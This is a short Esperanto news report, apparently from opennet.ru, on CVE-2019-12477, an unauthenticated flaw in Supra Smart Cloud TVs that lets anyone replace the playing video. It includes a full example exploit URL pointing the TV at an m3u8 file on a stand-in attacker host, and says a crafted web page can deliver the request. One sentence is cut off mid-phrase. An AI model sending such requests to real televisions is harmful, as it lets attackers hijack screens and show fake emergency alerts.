Sur Supra Smart Cloud-televidiloj vundebleco (CVE-2019-12477), kiu ebligas al vi anstataŭigi la nuntempe viditan programon per la enhavo de la atakanto. Ekzemple, la eligo de fikcia averto pri kriz-situacio estas pruvita.
Por atako, sufiĉas sendi speciale kreitan retan peton, kiu ne postulas aŭtentigon. Precipe, vi povas aliri la pritraktilon “/remote/media_control?action=setUri&uri=” specifante la URL de la m3u8-dosiero kun video-parametroj, ekzemple “http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8."
Plejofte, aliro al la IP-adreso de la televidilo estas limigita al la interna reto, sed ĉar la peto estas sendita per HTTP, eblas uzi metodojn por aliri internajn rimedojn kiam la uzanto malfermas speciale desegnitan eksteran paĝon (ekzemple, sub la alivestiĝo de bildpeto aŭ uzante la ).
fonto: opennet.ru